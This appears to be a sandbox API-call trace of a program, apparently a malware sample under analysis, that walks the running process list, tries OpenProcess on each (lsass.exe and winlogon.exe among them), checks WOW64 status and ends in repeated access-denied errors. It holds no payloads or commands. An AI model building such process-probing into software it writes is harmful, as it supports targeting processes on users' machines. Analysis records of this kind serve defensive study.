	[0073.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0073.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0073.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0073.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0073.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0073.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0073.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0073.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0073.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0073.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0073.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0073.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0073.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0073.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0073.170] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.170] CloseHandle (hObject=0x224) returned 1
	[0073.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0073.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0073.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728838, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0073.171] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.171] CloseHandle (hObject=0x224) returned 1
	[0073.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728a58, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0073.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0073.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0073.171] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.171] CloseHandle (hObject=0x224) returned 1
	[0073.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0073.171] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.171] CloseHandle (hObject=0x224) returned 1
	[0073.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0073.172] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.172] CloseHandle (hObject=0x224) returned 1
	[0073.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0073.172] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.172] CloseHandle (hObject=0x224) returned 1
	[0073.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0073.172] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.172] CloseHandle (hObject=0x224) returned 1
	[0073.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0073.172] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.172] CloseHandle (hObject=0x224) returned 1
	[0073.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0073.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0073.173] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.173] CloseHandle (hObject=0x224) returned 1
	[0073.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0073.173] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.173] CloseHandle (hObject=0x224) returned 1
	[0073.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0073.173] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.173] CloseHandle (hObject=0x224) returned 1
	[0073.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728a18, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0073.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0073.173] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.173] CloseHandle (hObject=0x224) returned 1
	[0073.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0073.174] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.174] CloseHandle (hObject=0x224) returned 1
	[0073.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dbb0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0073.174] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.174] CloseHandle (hObject=0x224) returned 1
	[0073.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728a98, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0073.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0073.174] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.174] CloseHandle (hObject=0x224) returned 1
	[0073.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0073.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0073.174] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.174] CloseHandle (hObject=0x224) returned 1
	[0073.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0073.174] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.175] CloseHandle (hObject=0x224) returned 1
	[0073.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0073.175] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.175] CloseHandle (hObject=0x224) returned 1
	[0073.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0073.175] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.175] CloseHandle (hObject=0x224) returned 1
	[0073.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728a18, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0073.175] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.175] CloseHandle (hObject=0x224) returned 1
	[0073.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728a38, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0073.175] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.175] CloseHandle (hObject=0x224) returned 1
	[0073.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0073.176] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.176] CloseHandle (hObject=0x224) returned 1
	[0073.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0073.176] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.176] CloseHandle (hObject=0x224) returned 1
	[0073.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e798, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0073.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0073.176] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.176] CloseHandle (hObject=0x224) returned 1
	[0073.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0073.176] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.176] CloseHandle (hObject=0x224) returned 1
	[0073.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0073.176] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.176] CloseHandle (hObject=0x224) returned 1
	[0073.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0073.177] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.177] CloseHandle (hObject=0x224) returned 1
	[0073.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0073.177] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.177] CloseHandle (hObject=0x224) returned 1
	[0073.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0073.177] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.177] CloseHandle (hObject=0x224) returned 1
	[0073.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e860, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0073.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0073.177] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.177] CloseHandle (hObject=0x224) returned 1
	[0073.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e810, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0073.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.177] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.177] CloseHandle (hObject=0x224) returned 1
	[0073.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.178] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
